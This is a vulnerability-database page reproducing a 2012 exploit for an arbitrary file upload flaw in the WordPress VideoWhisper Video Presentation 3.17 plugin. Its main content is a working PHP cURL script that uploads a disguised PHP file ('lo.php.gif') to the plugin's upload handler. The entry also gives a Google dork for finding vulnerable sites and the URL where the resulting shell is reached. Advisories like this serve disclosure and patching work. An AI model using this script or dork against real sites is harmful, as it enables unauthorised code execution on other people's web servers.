Lucene search

K

WordPress VideoWhisper Video Presentation 3.17 Shell Upload

πŸ—“οΈΒ 07 Jun 2012Β 00:00:00Reported byΒ Sammy FORGITTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstormsecurity.comπŸ‘Β 21Β Views

Wordpress Video Presentation 3.17 Shell Upload Vulnerabilit

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`##################################################  
# Description : Wordpress Plugins - VideoWhisper Video Presentation   
Arbitrary File Upload Vulnerability  
# Version : 3.17  
# Link :   
http://wordpress.org/extend/plugins/videowhisper-video-presentation/  
# Plugins :   
http://downloads.wordpress.org/plugin/videowhisper-video-presentation.zip  
# Date : 31-05-2012  
# Google Dork : inurl:/wp-content/plugins/videowhisper-video-presentation/  
# Author : Sammy FORGIT - sam at opensyscom dot fr -   
http://www.opensyscom.fr  
##################################################  
  
  
Exploit :  
  
PostShell.php  
<?php  
  
$uploadfile="lo.php.gif";  
$ch =   
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,  
array('Filedata'=>"@$uploadfile",  
'room'=>'./'));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
$postResult = curl_exec($ch);  
curl_close($ch);  
print "$postResult";  
  
?>  
  
Shell Access :  
http://www.exemple.com/wordpress/wp-content/plugins/videowhisper-video-presentation/vp/uploads/lo.php.gif  
  
lo.php.gif  
<?php  
phpinfo();  
?>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
07 Jun 2012 00:00Current
0.5Low risk
Vulners AI Score0.5
21
.json
Report